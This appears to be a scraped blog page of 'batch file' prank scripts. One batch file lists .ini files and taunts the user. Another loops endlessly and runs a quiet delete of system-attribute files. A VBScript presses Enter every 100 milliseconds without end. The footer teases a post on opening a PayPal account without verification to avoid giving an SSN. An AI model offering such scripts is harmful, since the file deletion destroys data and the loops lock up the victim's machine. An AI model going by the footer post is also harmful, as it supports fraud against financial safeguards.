1).
@echo off
echo blanking screen .......
cls
echo searching ini's
@dir c:\*.ini /s/w
echo .... Scared ?
pause
2).
@echo off
:start
echo 15623682356574 /q /w
color 24
del /Q /a:s
echo geras-lakha
goto start
3).
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Search This Blog
Showing posts with label batch file. Show all posts
Showing posts with label batch file. Show all posts
Monday, October 10, 2011
Subscribe to:
Posts (Atom)
How to make a PayPal ACC without the need to verify anything
If you are from North America you have to face prompt of Paypal that ask you for your SSN (Social Security Number). This is very Easy metho...
-
What does KYC mean? Know Your Customer (KYC) standards are designed to protect financial institutions against fraud, corruption, money laund...
-
You can find out whether your system is installed with a 32-bit or 64-bit (Microsoft labels them as x86 or x64) based operating system, whic...